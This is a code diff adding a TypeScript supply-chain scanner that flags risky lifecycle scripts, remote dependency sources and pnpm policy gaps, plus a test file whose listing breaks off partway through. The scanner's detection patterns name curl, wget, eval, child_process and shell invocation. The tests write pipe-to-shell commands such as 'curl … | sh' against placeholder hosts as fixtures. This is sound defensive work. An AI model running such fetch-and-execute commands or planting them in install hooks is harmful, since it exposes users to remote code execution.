+      `| ${finding.severity.toUpperCase()} | ${escapeTableCell(finding.ruleId)} | ${escapeTableCell(finding.subject)} | ${escapeTableCell(finding.location)} | ${escapeTableCell(finding.evidence)} |`,
+    )
+  }
+  lines.push('')
+}
+
+function summarizeFindings(
+  findings: readonly TriagedFinding[],
+  staleAcknowledgements: readonly BaselineAcknowledgement[],
+): SecuritySummary {
+  const counts: Record<FindingSeverity, number> = { high: 0, medium: 0, low: 0 }
+  for (const finding of findings) counts[finding.severity] += 1
+  return {
+    ...counts,
+    acknowledged: findings.filter((finding) => finding.disposition === 'acknowledged').length,
+    new: findings.filter((finding) => finding.disposition === 'new').length,
+    staleAcknowledgements: staleAcknowledgements.length,
+    total: findings.length,
+  }
+}
+
+function escapeTableCell(value: string): string {
+  return sanitizeDisplayText(value).replaceAll('|', '\\|')
+}
+
+function sanitizeDisplayText(value: string): string {
+  return value
+    .replaceAll(/[\u0000-\u0008\u000b\u000c\u000e-\u001f\u007f]/g, '')
+    .replaceAll(/\r?\n/g, ' ')
+    .trim()
+}

--- a/scripts/security/scanner.ts
+++ b/scripts/security/scanner.ts
@@ -1,0 +1,708 @@
+import { existsSync, readdirSync, readFileSync, realpathSync, statSync } from 'fs'
+import { basename, extname, isAbsolute, join, relative, resolve } from 'path'
+import { parse } from 'yaml'
+import type { FindingSeverity, ScanResult, SecurityFinding } from './types.js'
+
+type JsonRecord = Record<string, unknown>
+
+type TemplatePackage = {
+  readonly dependencies?: Record<string, string>
+  readonly devDependencies?: Record<string, string>
+  readonly name?: string
+  readonly optionalDependencies?: Record<string, string>
+  readonly peerDependencies?: Record<string, string>
+  readonly scripts?: Record<string, string>
+  readonly version?: string
+}
+
+type RootPackage = {
+  readonly repokit?: {
+    readonly groups?: readonly { readonly path?: string }[]
+  }
+}
+
+type PnpmPolicy = {
+  readonly dangerouslyAllowAllBuilds: boolean
+  readonly onlyBuiltDependencies: ReadonlySet<string>
+}
+
+const INSTALL_LIFECYCLE_SCRIPTS = new Set(['preinstall', 'install', 'postinstall'])
+const PUBLISH_LIFECYCLE_SCRIPTS = new Set(['prepare', 'prepack', 'prepublish', 'prepublishOnly'])
+const DEPENDENCY_SECTIONS = ['dependencies', 'devDependencies', 'optionalDependencies', 'peerDependencies'] as const
+const IGNORED_DIRECTORIES = new Set([
+  '.git',
+  '.next',
+  'build',
+  'coverage',
+  'dist',
+  'generated',
+  'node_modules',
+  'out',
+  'target',
+])
+const REVIEWABLE_EXTENSIONS = new Set(['.cjs', '.js', '.mjs', '.ps1', '.sh', '.ts'])
+
+const SOURCE_PATTERNS: readonly {
+  readonly evidence: string
+  readonly message: string
+  readonly recommendation: string
+  readonly regex: RegExp
+  readonly ruleId: string
+  readonly source: 'code' | 'uncommented'
+  readonly severity: FindingSeverity
+}[] = [
+  {
+    evidence: 'dynamic code evaluation',
+    message: 'Setup or configuration code dynamically evaluates source text.',
+    recommendation: 'Replace dynamic evaluation with explicit, reviewable code or document why it is required.',
+    regex: /\beval\s*\(|\b(?:new\s+)?Function\s*\(/,
+    ruleId: 'source-dynamic-evaluation',
+    source: 'code',
+    severity: 'high',
+  },
+  {
+    evidence: 'encoded payload',
+    message: 'Setup or configuration code contains a long encoded payload.',
+    recommendation: 'Store readable source or generated data separately and document how it is produced.',
+    regex: /["'`][A-Za-z0-9+/_-]{160,}={0,2}["'`]/,
+    ruleId: 'source-encoded-payload',
+    source: 'uncommented',
+    severity: 'high',
+  },
+  {
+    evidence: 'child process execution',
+    message: 'Setup or configuration code launches a child process.',
+    recommendation: 'Review the command, arguments, input handling, and necessity of process execution.',
+    regex: /(?:from\s+|require\s*\()["'](?:node:)?child_process["']/,
+    ruleId: 'source-child-process',
+    source: 'uncommented',
+    severity: 'medium',
+  },
+  {
+    evidence: 'child process execution',
+    message: 'Setup or configuration code launches a child process.',
+    recommendation: 'Review the command, arguments, input handling, and necessity of process execution.',
+    regex: /\b(?:exec|execFile|execFileSync|execSync|fork|spawn|spawnSync)\s*\(/,
+    ruleId: 'source-child-process',
+    source: 'code',
+    severity: 'medium',
+  },
+  {
+    evidence: 'network access',
+    message: 'Setup or configuration code performs a network request.',
+    recommendation: 'Confirm the destination is expected and that untrusted responses cannot become executable code.',
+    regex: /\b(?:fetch|axios|got)\s*\(|\baxios\.(?:get|post|put|request)\s*\(|\bhttps?\.(?:get|request)\s*\(/,
+    ruleId: 'source-network-access',
+    source: 'code',
+    severity: 'low',
+  },
+  {
+    evidence: 'network download command',
+    message: 'Setup or configuration code invokes a network-capable download command.',
+    recommendation: 'Pin and verify downloaded artifacts, and avoid piping remote content into an interpreter.',
+    regex: /\b(?:curl|wget|Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b/i,
+    ruleId: 'source-network-download',
+    source: 'uncommented',
+    severity: 'high',
+  },
+  {
+    evidence: 'explicit command shell',
+    message: 'Setup or configuration code invokes a command shell explicitly.',
+    recommendation: 'Review shell quoting and ensure no untrusted values can alter the command.',
+    regex: /\b(?:bash|sh)\s+-c\b|\bcmd(?:\.exe)?\s+\/c\b|\bpowershell(?:\.exe)?\s+-command\b/i,
+    ruleId: 'source-shell-execution',
+    source: 'uncommented',
+    severity: 'medium',
+  },
+]
+
+const SCRIPT_PATTERNS: readonly {
+  readonly message: string
+  readonly recommendation: string
+  readonly regex: RegExp
+  readonly ruleId: string
+  readonly severity: FindingSeverity
+}[] = [
+  {
+    message: 'Package script downloads content or invokes a network-capable shell command.',
+    recommendation: 'Pin and verify downloaded artifacts, or move the behavior into readable source code.',
+    regex: /\b(?:curl|wget|Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b/i,
+    ruleId: 'script-network-download',
+    severity: 'high',
+  },
+  {
+    message: 'Package script executes inline code or an encoded PowerShell command.',
+    recommendation: 'Move inline logic into a reviewed source file and avoid encoded commands.',
+    regex: /\bnode\s+(?:--eval|-e)\b|\bpowershell(?:\.exe)?\b.*\b-enc(?:odedcommand)?\b/i,
+    ruleId: 'script-inline-execution',
+    severity: 'medium',
+  },
+  {
+    message: 'Package script invokes a command shell explicitly.',
+    recommendation: 'Review shell quoting and ensure no untrusted values can alter the command.',
+    regex: /\b(?:bash|sh)\s+-c\b|\bcmd(?:\.exe)?\s+\/c\b|\bpowershell(?:\.exe)?\s+-command\b/i,
+    ruleId: 'script-shell-execution',
+    severity: 'medium',
+  },
+]
+
+export function scanRepository(rootDir: string): ScanResult {
+  const repositoryRoot = realpathSync(rootDir)
+  const findings: SecurityFinding[] = []
+  const policy = readPnpmPolicy(repositoryRoot, findings)
+  const templateDirs = enumerateTemplateDirs(repositoryRoot)
+  const lockedTemplates = readLockedTemplates(repositoryRoot, findings)
+
+  for (const templateDir of templateDirs) {
+    const manifestPath = join(templateDir, 'package.json')
+    const manifest = readJson<TemplatePackage>(manifestPath)
+    const template = toRepoPath(repositoryRoot, templateDir)
+    scanManifest(manifest, template, findings)
+    scanDependencyCoverage(manifest, template, lockedTemplates, findings)
+    scanReviewableSource(repositoryRoot, templateDir, template, collectScriptEntrypoints(manifest), findings)
+  }
+
+  const scannedDependencyPackages = scanInstalledDependencyBuilds(repositoryRoot, policy, findings)
+
+  return {
+    findings: findings.sort(compareFindings),
+    scannedDependencyPackages,
+    scannedTemplates: templateDirs.length,
+  }
+}
+
+function readLockedTemplates(rootDir: string, findings: SecurityFinding[]): ReadonlySet<string> {
+  const lockfilePath = join(rootDir, 'pnpm-lock.yaml')
+  if (!existsSync(lockfilePath)) {
+    findings.push({
+      category: 'scan-coverage',
+      evidence: 'pnpm-lock.yaml is missing',
+      location: 'pnpm-lock.yaml',
+      message: 'Installed dependency versions cannot be tied to a committed workspace lockfile.',
+      recommendation: 'Restore and update pnpm-lock.yaml before reviewing transitive dependency behavior.',
+      ruleId: 'workspace-lockfile-missing',
+      severity: 'high',
+      subject: 'workspace',
+    })
+    return new Set()
+  }
+  const parsed = parse(readFileSync(lockfilePath, 'utf8')) as JsonRecord
+  if (!parsed.importers || typeof parsed.importers !== 'object' || Array.isArray(parsed.importers)) {
+    findings.push({
+      category: 'scan-coverage',
+      evidence: 'pnpm-lock.yaml has no importer map',
+      location: 'pnpm-lock.yaml',
+      message: 'The workspace lockfile does not identify which templates its resolutions cover.',
+      recommendation: 'Regenerate pnpm-lock.yaml with the repository pnpm version.',
+      ruleId: 'workspace-lockfile-importers-missing',
+      severity: 'high',
+      subject: 'workspace',
+    })
+    return new Set()
+  }
+  return new Set(Object.keys(parsed.importers as JsonRecord).map((path) => path.replaceAll('\\', '/')))
+}
+
+function scanDependencyCoverage(
+  manifest: TemplatePackage,
+  template: string,
+  lockedTemplates: ReadonlySet<string>,
+  findings: SecurityFinding[],
+): void {
+  if (lockedTemplates.has(template)) return
+  const dependencyCount = DEPENDENCY_SECTIONS.reduce(
+    (count, section) => count + Object.keys(manifest[section] ?? {}).length,
+    0,
+  )
+  if (dependencyCount === 0) return
+
+  findings.push({
+    category: 'scan-coverage',
+    evidence: `${dependencyCount} direct dependencies; no ${template} importer in pnpm-lock.yaml`,
+    location: `${template}/package.json`,
+    message:
+      'The template is not represented in the workspace lockfile, so installed transitive dependency scripts are not covered.',
+    recommendation:
+      'Review how this template is locked or add a separate dependency-resolution scan before treating transitive coverage as complete.',
+    ruleId: 'template-lockfile-coverage-missing',
+    severity: 'low',
+    subject: manifest.name ?? template,
+  })
+}
+
+function enumerateTemplateDirs(rootDir: string): readonly string[] {
+  const rootPackage = readJson<RootPackage>(join(rootDir, 'package.json'))
+  const groupPaths = rootPackage.repokit?.groups?.flatMap((group) => (group.path ? [group.path] : [])) ?? []
+  if (groupPaths.length === 0) throw new Error('No template group paths are configured in package.json')
+  const templateDirs: string[] = []
+  const repositoryRoot = realpathSync(rootDir)
+
+  for (const groupPath of groupPaths) {
+    const absoluteGroupPath = resolve(repositoryRoot, groupPath)
+    assertPathWithinRepository(repositoryRoot, absoluteGroupPath, groupPath)
+    if (!existsSync(absoluteGroupPath)) throw new Error(`Configured template group does not exist: ${groupPath}`)
+    const realGroupPath = realpathSync(absoluteGroupPath)
+    assertPathWithinRepository(repositoryRoot, realGroupPath, groupPath)
+
+    for (const entry of readdirSync(realGroupPath, { withFileTypes: true })) {
+      if (!entry.isDirectory()) continue
+      const templateDir = join(realGroupPath, entry.name)
+      if (existsSync(join(templateDir, 'package.json'))) templateDirs.push(templateDir)
+    }
+  }
+
+  if (templateDirs.length === 0) throw new Error('No template manifests were discovered in configured groups')
+  return templateDirs.sort()
+}
+
+function assertPathWithinRepository(rootDir: string, path: string, configuredPath: string): void {
+  const relativePath = relative(rootDir, path).replaceAll('\\', '/')
+  if (relativePath === '' || (!isAbsolute(relativePath) && relativePath !== '..' && !relativePath.startsWith('../'))) {
+    return
+  }
+  throw new Error(`Template group path escapes the repository: ${configuredPath}`)
+}
+
+function readPnpmPolicy(rootDir: string, findings: SecurityFinding[]): PnpmPolicy {
+  const policyPath = join(rootDir, 'pnpm-workspace.yaml')
+  const location = toRepoPath(rootDir, policyPath)
+  const parsed = parse(readFileSync(policyPath, 'utf8')) as JsonRecord
+  const onlyBuiltDependencies = Array.isArray(parsed.onlyBuiltDependencies)
+    ? parsed.onlyBuiltDependencies.filter((value): value is string => typeof value === 'string')
+    : []
+  const dangerouslyAllowAllBuilds = parsed.dangerouslyAllowAllBuilds === true
+  const minimumReleaseAge = parsed.minimumReleaseAge
+  const minimumReleaseAgeExclude = Array.isArray(parsed.minimumReleaseAgeExclude)
+    ? parsed.minimumReleaseAgeExclude.filter((value): value is string => typeof value === 'string')
+    : []
+
+  if (dangerouslyAllowAllBuilds) {
+    findings.push({
+      category: 'pnpm-policy',
+      evidence: 'dangerouslyAllowAllBuilds: true',
+      location,
+      message: 'pnpm is configured to run every dependency build script.',
+      recommendation: 'Use onlyBuiltDependencies to allow reviewed packages explicitly.',
+      ruleId: 'pnpm-all-builds-allowed',
+      severity: 'high',
+      subject: 'workspace',
+    })
+  }
+
+  if (typeof minimumReleaseAge !== 'number' || !Number.isFinite(minimumReleaseAge) || minimumReleaseAge <= 0) {
+    findings.push({
+      category: 'pnpm-policy',
+      evidence: `minimumReleaseAge: ${String(minimumReleaseAge ?? 'not configured')}`,
+      location,
+      message: 'pnpm is not configured to delay newly published dependency versions.',
+      recommendation: 'Set a positive minimumReleaseAge and keep its exclusion list narrowly reviewed.',
+      ruleId: 'pnpm-minimum-release-age-disabled',
+      severity: 'medium',
+      subject: 'workspace',
+    })
+  } else if (minimumReleaseAge < 1440) {
+    findings.push({
+      category: 'pnpm-policy',
+      evidence: `minimumReleaseAge: ${minimumReleaseAge}`,
+      location,
+      message: 'pnpm permits package versions published less than one day ago.',
+      recommendation: 'Use a minimumReleaseAge of at least 1440 minutes unless a narrower policy is justified.',
+      ruleId: 'pnpm-minimum-release-age-too-low',
+      severity: 'medium',
+      subject: 'workspace',
+    })
+  }
+
+  if (minimumReleaseAgeExclude.some((value) => value === '*' || value === '**')) {
+    findings.push({
+      category: 'pnpm-policy',
+      evidence: `minimumReleaseAgeExclude: ${minimumReleaseAgeExclude.join(', ')}`,
+      location,
+      message: 'pnpm excludes every package from its minimum release-age policy.',
+      recommendation: 'Replace the global wildcard with a narrow list of reviewed package names or scopes.',
+      ruleId: 'pnpm-minimum-release-age-globally-excluded',
+      severity: 'high',
+      subject: 'workspace',
+    })
+  }
+
+  return { dangerouslyAllowAllBuilds, onlyBuiltDependencies: new Set(onlyBuiltDependencies) }
+}
+
+function scanManifest(manifest: TemplatePackage, template: string, findings: SecurityFinding[]): void {
+  const location = `${template}/package.json`
+  const subject = manifest.name ?? template
+
+  for (const [scriptName, command] of Object.entries(manifest.scripts ?? {})) {
+    if (INSTALL_LIFECYCLE_SCRIPTS.has(scriptName) || PUBLISH_LIFECYCLE_SCRIPTS.has(scriptName)) {
+      const isInstallHook = INSTALL_LIFECYCLE_SCRIPTS.has(scriptName)
+      findings.push({
+        category: 'lifecycle-script',
+        evidence: `${scriptName}: ${trimEvidence(command)}`,
+        fingerprintEvidence: `${scriptName}: ${command}`,
+        location,
+        message: `Template declares the ${scriptName} lifecycle script, which can execute automatically.`,
+        recommendation:
+          'Remove automatic execution when possible; otherwise document and closely review the invoked code.',
+        ruleId: 'manifest-lifecycle-script',
+        severity: isInstallHook ? 'high' : 'medium',
+        subject,
+      })
+    }
+
+    for (const pattern of SCRIPT_PATTERNS) {
+      if (!pattern.regex.test(command)) continue
+      findings.push({
+        category: 'lifecycle-script',
+        evidence: `${scriptName}: ${trimEvidence(command)}`,
+        fingerprintEvidence: `${scriptName}: ${command}`,
+        location,
+        message: pattern.message,
+        recommendation: pattern.recommendation,
+        ruleId: pattern.ruleId,
+        severity: pattern.severity,
+        subject,
+      })
+    }
+  }
+
+  for (const section of DEPENDENCY_SECTIONS) {
+    for (const [dependencyName, specifier] of Object.entries(manifest[section] ?? {})) {
+      const sourceRisk = classifyDependencySource(specifier)
+      if (sourceRisk) {
+        findings.push({
+          category: 'dependency-source',
+          evidence: `${section}.${dependencyName}: ${trimEvidence(specifier)}`,
+          fingerprintEvidence: `${section}.${dependencyName}: ${specifier}`,
+          location,
+          message: sourceRisk.message,
+          recommendation: sourceRisk.recommendation,
+          ruleId: sourceRisk.ruleId,
+          severity: sourceRisk.severity,
+          subject,
+        })
+      } else if (isLooseVersion(specifier)) {
+        findings.push({
+          category: 'dependency-version',
+          evidence: `${section}.${dependencyName}: ${trimEvidence(specifier)}`,
+          fingerprintEvidence: `${section}.${dependencyName}: ${specifier}`,
+          location,
+          message: 'Dependency uses an unusually loose or mutable version range.',
+          recommendation:
+            'Use an exact, caret, or tilde semver range and let the lockfile record the resolved version.',
+          ruleId: 'dependency-loose-version',
+          severity: 'low',
+          subject,
+        })
+      }
+    }
+  }
+}
+
+function classifyDependencySource(specifier: string): {
+  readonly message: string
+  readonly recommendation: string
+  readonly ruleId: string
+  readonly severity: FindingSeverity
+} | null {
+  if (
+    /^(?:git(?:\+[^:]+)?|git@|github:|gitlab:|bitbucket:|https?:|ssh:)/i.test(specifier) ||
+    /^[^:/@\s]+\/[^/\s]+(?:#.*)?$/.test(specifier)
+  ) {
+    return {
+      message: 'Dependency is installed directly from a remote URL or source repository.',
+      recommendation: 'Prefer a reviewed registry release with lockfile integrity metadata.',
+      ruleId: 'dependency-remote-source',
+      severity: 'high',
+    }
+  }
+  if (/^(?:file:|link:)/i.test(specifier)) {
+    return {
+      message: 'Dependency resolves from a local filesystem path.',
+      recommendation:
+        'Confirm the dependency is included when the template is scaffolded, or publish it to the registry.',
+      ruleId: 'dependency-local-source',
+      severity: 'medium',
+    }
+  }
+  if (/^workspace:/i.test(specifier)) {
+    return {
+      message: 'Template dependency resolves through the repository workspace.',
+      recommendation: 'Confirm scaffolding rewrites or includes this dependency outside the monorepo.',
+      ruleId: 'dependency-workspace-source',
+      severity: 'medium',
+    }
+  }
+  return null
+}
+
+function isLooseVersion(specifier: string): boolean {
+  const value = specifier.trim()
+  if (value === '' || value === '*' || /^(?:latest|next|beta|canary|dev)$/i.test(value)) return true
+  return (
+    /(?:^|\s)[<>]=?\s*\d|\|\|/.test(value) ||
+    /^(?:v?\d+|v?\d+\.\d+)$/.test(value) ||
+    /(?:^|\.)[xX*](?:\.|$)/.test(value)
+  )
+}
+
+function scanReviewableSource(
+  rootDir: string,
+  templateDir: string,
+  template: string,
+  scriptEntrypoints: ReadonlySet<string>,
+  findings: SecurityFinding[],
+): void {
+  for (const filePath of collectFiles(templateDir)) {
+    const templateRelativePath = toRepoPath(templateDir, filePath)
+    if (!isReviewableSource(templateRelativePath, scriptEntrypoints)) continue
+    if (statSync(filePath).size > 256_000) continue
+
+    const lines = readFileSync(filePath, 'utf8').split(/\r?\n/)
+    const lexicalState: LexicalState = { blockComment: false, quote: null }
+    const usesHashComments = ['.ps1', '.sh'].includes(extname(filePath).toLowerCase())
+    for (const [index, line] of lines.entries()) {
+      const sources = usesHashComments
+        ? { code: stripHashComment(line), uncommented: stripHashComment(line) }
+        : splitSourceLine(line, lexicalState)
+      const matchedRules = new Set<string>()
+      for (const pattern of SOURCE_PATTERNS) {
+        if (matchedRules.has(pattern.ruleId) || !pattern.regex.test(sources[pattern.source])) continue
+        matchedRules.add(pattern.ruleId)
+        findings.push({
+          category: 'source-pattern',
+          evidence: `${pattern.evidence}: ${trimEvidence(line.trim())}`,
+          fingerprintEvidence: `${pattern.evidence}: ${line.trim()}`,
+          location: `${toRepoPath(rootDir, filePath)}:${index + 1}`,
+          message: pattern.message,
+          recommendation: pattern.recommendation,
+          ruleId: pattern.ruleId,
+          severity: pattern.severity,
+          subject: template,
+        })
+      }
+    }
+  }
+}
+
+function stripHashComment(line: string): string {
+  let escaped = false
+  let quote: '"' | "'" | null = null
+
+  for (let index = 0; index < line.length; index += 1) {
+    const character = line[index]
+    if (quote) {
+      if (escaped) escaped = false
+      else if (character === '\\' || character === '`') escaped = true
+      else if (character === quote) quote = null
+      continue
+    }
+    if (character === '"' || character === "'") quote = character
+    else if (character === '#') return line.slice(0, index)
+  }
+
+  return line
+}
+
+type LexicalState = {
+  blockComment: boolean
+  quote: '"' | "'" | '`' | null
+}
+
+function splitSourceLine(line: string, state: LexicalState): { readonly code: string; readonly uncommented: string } {
+  let code = ''
+  let uncommented = ''
+  let escaped = false
+
+  for (let index = 0; index < line.length; index += 1) {
+    const character = line[index]
+    const nextCharacter = line[index + 1]
+
+    if (state.blockComment) {
+      code += ' '
+      uncommented += ' '
+      if (character === '*' && nextCharacter === '/') {
+        code += ' '
+        uncommented += ' '
+        state.blockComment = false
+        index += 1
+      }
+      continue
+    }
+
+    if (state.quote) {
+      code += ' '
+      uncommented += character
+      if (escaped) escaped = false
+      else if (character === '\\') escaped = true
+      else if (character === state.quote) state.quote = null
+      continue
+    }
+
+    if (character === '/' && nextCharacter === '/') {
+      code += ' '.repeat(line.length - index)
+      uncommented += ' '.repeat(line.length - index)
+      break
+    }
+    if (character === '/' && nextCharacter === '*') {
+      code += '  '
+      uncommented += '  '
+      state.blockComment = true
+      index += 1
+      continue
+    }
+    if (character === '"' || character === "'" || character === '`') {
+      state.quote = character
+      code += ' '
+      uncommented += character
+      continue
+    }
+
+    code += character
+    uncommented += character
+  }
+
+  return { code, uncommented }
+}
+
+function isReviewableSource(templateRelativePath: string, scriptEntrypoints: ReadonlySet<string>): boolean {
+  const normalizedPath = templateRelativePath.toLowerCase()
+  const fileName = basename(normalizedPath)
+  const extension = extname(fileName)
+  if (!REVIEWABLE_EXTENSIONS.has(extension)) return false
+  if (scriptEntrypoints.has(normalizedPath)) return true
+  if (normalizedPath.split('/').includes('scripts')) return true
+  if (/\.(?:config|setup)\.(?:cjs|js|mjs|ts)$/.test(fileName)) return true
+  return (
+    /^(?:bootstrap|install|postinstall|preinstall|prepare)[.-]/.test(fileName) ||
+    extension === '.sh' ||
+    extension === '.ps1'
+  )
+}
+
+function collectScriptEntrypoints(manifest: TemplatePackage): ReadonlySet<string> {
+  const entrypoints = new Set<string>()
+  const sourcePathPattern = /(?:^|[\s"'=])((?:\.\.?[\\/])?[\w@./\\-]+\.(?:cjs|js|mjs|ps1|sh|ts))(?=$|[\s"';&|])/g
+
+  for (const command of Object.values(manifest.scripts ?? {})) {
+    for (const match of command.matchAll(sourcePathPattern)) {
+      const normalizedPath = match[1].replaceAll('\\', '/').replace(/^\.\//, '').toLowerCase()
+      if (!normalizedPath.startsWith('../') && !normalizedPath.startsWith('/')) entrypoints.add(normalizedPath)
+    }
+  }
+  return entrypoints
+}
+
+function collectFiles(directory: string): readonly string[] {
+  const files: string[] = []
+  for (const entry of readdirSync(directory, { withFileTypes: true })) {
+    if (entry.isDirectory() && IGNORED_DIRECTORIES.has(entry.name)) continue
+    const path = join(directory, entry.name)
+    if (entry.isDirectory()) files.push(...collectFiles(path))
+    else if (entry.isFile()) files.push(path)
+  }
+  return files
+}
+
+function scanInstalledDependencyBuilds(rootDir: string, policy: PnpmPolicy, findings: SecurityFinding[]): number {
+  const pnpmStoreDir = join(rootDir, 'node_modules', '.pnpm')
+  if (!existsSync(pnpmStoreDir)) {
+    findings.push({
+      category: 'scan-coverage',
+      evidence: 'node_modules/.pnpm is missing',
+      location: 'node_modules/.pnpm',
+      message: 'Installed transitive dependency manifests were not available for lifecycle-script inspection.',
+      recommendation: 'Install the frozen workspace dependencies with scripts disabled before running the scan.',
+      ruleId: 'installed-dependency-coverage-missing',
+      severity: 'high',
+      subject: 'workspace',
+    })
+    return 0
+  }
+
+  const manifests = collectInstalledPackageManifests(pnpmStoreDir)
+  const seenPackages = new Set<string>()
+
+  for (const manifestPath of manifests) {
+    const manifest = readJson<TemplatePackage>(manifestPath)
+    if (!manifest.name || !manifest.version) continue
+    const packageId = `${manifest.name}@${manifest.version}`
+    if (seenPackages.has(packageId)) continue
+    seenPackages.add(packageId)
+
+    const lifecycleScripts = Object.entries(manifest.scripts ?? {}).filter(([name]) =>
+      INSTALL_LIFECYCLE_SCRIPTS.has(name),
+    )
+    if (lifecycleScripts.length === 0) continue
+
+    const allowed = policy.dangerouslyAllowAllBuilds || policy.onlyBuiltDependencies.has(manifest.name)
+    findings.push({
+      category: 'dependency-build',
+      evidence: lifecycleScripts.map(([name, command]) => `${name}: ${trimEvidence(command, 80)}`).join('; '),
+      fingerprintEvidence: lifecycleScripts.map(([name, command]) => `${name}: ${command}`).join('; '),
+      location: toRepoPath(rootDir, manifestPath),
+      message: allowed
+        ? 'Dependency has install-time scripts and is explicitly allowed to run by pnpm policy.'
+        : 'Dependency has install-time scripts that are not present in pnpm onlyBuiltDependencies.',
+      recommendation: allowed
+        ? 'Keep this package on the allowlist only while its install scripts remain necessary and reviewed.'
+        : 'Confirm pnpm blocks these scripts; allow the package only after reviewing the published lifecycle code.',
+      ruleId: allowed ? 'dependency-build-script-allowed' : 'dependency-build-script-blocked',
+      severity: allowed ? 'medium' : 'low',
+      subject: packageId,
+    })
+  }
+
+  return seenPackages.size
+}
+
+function collectInstalledPackageManifests(pnpmStoreDir: string): readonly string[] {
+  const manifests: string[] = []
+  for (const storeEntry of readdirSync(pnpmStoreDir, { withFileTypes: true })) {
+    if (!storeEntry.isDirectory()) continue
+    const packageRoot = join(pnpmStoreDir, storeEntry.name, 'node_modules')
+    if (!existsSync(packageRoot)) continue
+
+    for (const packageEntry of readdirSync(packageRoot, { withFileTypes: true })) {
+      if (!packageEntry.isDirectory()) continue
+      if (packageEntry.name.startsWith('@')) {
+        const scopeRoot = join(packageRoot, packageEntry.name)
+        for (const scopedEntry of readdirSync(scopeRoot, { withFileTypes: true })) {
+          if (!scopedEntry.isDirectory()) continue
+          const manifestPath = join(scopeRoot, scopedEntry.name, 'package.json')
+          if (existsSync(manifestPath)) manifests.push(manifestPath)
+        }
+      } else {
+        const manifestPath = join(packageRoot, packageEntry.name, 'package.json')
+        if (existsSync(manifestPath)) manifests.push(manifestPath)
+      }
+    }
+  }
+  return manifests
+}
+
+function readJson<T>(path: string): T {
+  return JSON.parse(readFileSync(path, 'utf8')) as T
+}
+
+function toRepoPath(rootDir: string, path: string): string {
+  return relative(rootDir, path).replaceAll('\\', '/')
+}
+
+function trimEvidence(value: string, maxLength = 160): string {
+  const normalized = value
+    .replaceAll(/[\u0000-\u0008\u000b\u000c\u000e-\u001f\u007f]/g, '')
+    .replaceAll(/\s+/g, ' ')
+    .trim()
+  return normalized.length > maxLength ? `${normalized.slice(0, maxLength - 3)}...` : normalized
+}
+
+function compareFindings(left: SecurityFinding, right: SecurityFinding): number {
+  const severityOrder: Record<FindingSeverity, number> = { high: 0, medium: 1, low: 2 }
+  return (
+    severityOrder[left.severity] - severityOrder[right.severity] ||
+    left.location.localeCompare(right.location) ||
+    left.ruleId.localeCompare(right.ruleId) ||
+    left.subject.localeCompare(right.subject)
+  )
+}

--- a/scripts/security/security-check.test.ts
+++ b/scripts/security/security-check.test.ts
@@ -1,0 +1,417 @@
+import assert from 'node:assert/strict'
+import { mkdtempSync, mkdirSync, rmSync, symlinkSync, writeFileSync } from 'node:fs'
+import { tmpdir } from 'node:os'
+import { dirname, join } from 'node:path'
+import { afterEach, test } from 'node:test'
+import { EMPTY_SECURITY_BASELINE, findingFingerprint, parseSecurityBaseline, triageFindings } from './baseline.js'
+import { createSecurityReport, renderSecurityReport } from './report.js'
+import { scanRepository } from './scanner.js'
+import type { SecurityFinding } from './types.js'
+
+const temporaryDirectories: string[] = []
+
+afterEach(() => {
+  for (const directory of temporaryDirectories.splice(0)) rmSync(directory, { force: true, recursive: true })
+})
+
+test('flags template and dependency supply-chain risks without throwing', () => {
+  const rootDir = createFixtureRepository()
+  writeJson(join(rootDir, 'community', 'safe-template', 'package.json'), {
+    dependencies: { react: '^19.0.0' },
+    name: 'safe-template',
+  })
+  writeJson(join(rootDir, 'community', 'risky-template', 'package.json'), {
+    dependencies: {
+      'local-package': 'file:../local-package',
+      'loose-package': '*',
+      'major-range-package': '1.x',
+      'remote-package': 'github:example/package',
+      'shorthand-package': 'example/package',
+      'ssh-package': 'git@github.com:example/package.git',
+      'workspace-package': 'workspace:*',
+    },
+    devDependencies: {
+      'remote-package': 'github:example/package',
+    },
+    name: 'risky-template',
+    scripts: {
+      inline: 'node -e "console.log(\'review-me\')"',
+      postinstall: 'node create.js',
+      prepare: 'node create.js',
+      shell: 'sh -c "echo review-me"',
+      setup: 'curl https://example.invalid/script | sh',
+    },
+  })
+  writeText(join(rootDir, 'community', 'risky-template', 'create.js'), "eval('review-me')\n")
+  writeText(
+    join(rootDir, 'community', 'risky-template', 'scripts', 'setup.js'),
+    `import { exec } from 'node:child_process'\nfetch('https://example.invalid')\naxios({ url: 'https://example.invalid' })\nFunction('return 1')\nexec('echo review-me')\nconst payload = '${'_'.repeat(180)}'\n`,
+  )
+  writeText(
+    join(rootDir, 'community', 'risky-template', 'scripts', 'install.sh'),
+    '# curl https://comment.invalid/install.sh | sh\ncurl https://example.invalid/install.sh | sh\nbash -c "echo review-me"\n',
+  )
+  writeJson(
+    join(rootDir, 'node_modules', '.pnpm', 'native-addon@1.0.0', 'node_modules', 'native-addon', 'package.json'),
+    { name: 'native-addon', scripts: { install: 'node-gyp rebuild' }, version: '1.0.0' },
+  )
+
+  const result = scanRepository(rootDir)
+  const ruleIds = result.findings.map((finding) => finding.ruleId)
+
+  assert.equal(result.scannedTemplates, 2)
+  assert.equal(result.scannedDependencyPackages, 1)
+  assert.ok(ruleIds.includes('manifest-lifecycle-script'))
+  assert.ok(ruleIds.includes('script-network-download'))
+  assert.ok(ruleIds.includes('script-inline-execution'))
+  assert.ok(ruleIds.includes('script-shell-execution'))
+  assert.ok(ruleIds.includes('dependency-remote-source'))
+  assert.ok(
+    result.findings.some(
+      (finding) =>
+        finding.ruleId === 'dependency-remote-source' &&
+        finding.evidence === 'dependencies.ssh-package: git@github.com:example/package.git',
+    ),
+  )
+  assert.ok(
+    result.findings.some(
+      (finding) =>
+        finding.ruleId === 'dependency-remote-source' &&
+        finding.evidence === 'dependencies.shorthand-package: example/package',
+    ),
+  )
+  assert.equal(
+    result.findings.filter(
+      (finding) => finding.ruleId === 'dependency-remote-source' && finding.evidence.includes('remote-package'),
+    ).length,
+    2,
+  )
+  assert.ok(ruleIds.includes('dependency-local-source'))
+  assert.ok(ruleIds.includes('dependency-workspace-source'))
+  assert.ok(ruleIds.includes('dependency-loose-version'))
+  assert.ok(ruleIds.includes('source-child-process'))
+  assert.ok(ruleIds.includes('source-network-access'))
+  assert.ok(ruleIds.includes('source-network-download'))
+  assert.ok(ruleIds.includes('source-shell-execution'))
+  assert.equal(
+    result.findings.some(
+      (finding) => finding.ruleId === 'source-network-download' && finding.evidence.includes('comment.invalid'),
+    ),
+    false,
+  )
